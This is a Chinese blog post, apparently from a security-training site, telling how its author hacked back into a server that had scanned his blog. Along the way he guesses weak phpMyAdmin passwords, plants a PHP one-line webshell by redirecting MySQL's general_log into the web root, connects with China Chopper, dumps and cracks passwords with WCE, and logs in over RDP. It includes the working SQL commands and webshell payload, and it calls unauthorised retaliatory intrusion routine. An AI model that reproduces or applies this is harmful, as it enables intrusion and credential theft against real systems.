技术分享
针对某网站的渗透浅析
2019-07-09 10:15

一天下午,我正在得意洋洋的看着我的博客,发现某个IP正在对我的博客进行扫描,对此,你懂得。

对该IP进行扫描,发现开启了3389,3306,80等端口,初步判断是用phpmyadmin,于是在目录下输入默认phpmyadmin,就进入了很熟悉的界面,在尝试了几个弱口令之后便成功登入。

1.jpg

利用phpinfo和登录到界面的信息,可以看到该服务器的相关信息

2.png

3.png


第一次在导入一句话的时候因为“secure_file_priv”值为NULL,导致失败,后来转换思路利用日志写入上传成功

利用日志写入可写入一句话木马并用菜刀连接上。首先检测一下mysql全局变量的值

命令:SHOWVARIABLES LIKE"general%"

4.png

从图可以看出general_log是关闭的,log的存放位置是C:/phpStudy/PHPTutorial/WWW/

我们所要做的就是开启general_log,然后修改日志的保存位置

命令:setglobal general_log = "ON";

SET globalgeneral_log_file='C:/phpStudy/PHPTutorial/WWW/1.php'

5.png

6.png


接下来就是插入一句话木马了。命令:select'<?php eval($_POST[hack]);?>';

7.png

最后关闭日志记录,命令:setglobal general_log = "OFF";  然后利用菜刀进行连接

8.png

判断用户的权限

9.png

上传wce工具进行密码抓取

0.png

在相关网站上破解MD5密码

11.png

拿到账号和密码之后,因为开启了3389,所以直接连

12.png

大致看了一下连接状态,本来想装一个键盘记录器,最后还是算了,一个小站,而且还是云服务器,没啥多大利用的价值。

13.jpg

声明:作者初衷用于分享与普及网络知识,若读者因此作出任何危害网络安全行为后果自负,与合天智汇及原作者无关。


实操推荐

全面分析中国菜刀及隐藏后门 :了解中国菜刀的特性及其通信原理、机制,并且学会分析可能隐藏的后门以及其工作原理。

长按下面二维码,或点击 合天网安实验室 可预览学习(PC端操作最佳哟)

15.png

长按开始学习吧~

 

上一篇:看我如何百度到某校园内网
下一篇:Redis 4.x 5.xRCE复现
版权所有 合天智汇信息技术有限公司 2013-2018 湘ICP备14001562号-6
Copyright © 2013-2018 Heetian Corporation, All rights reserved
4006-123-731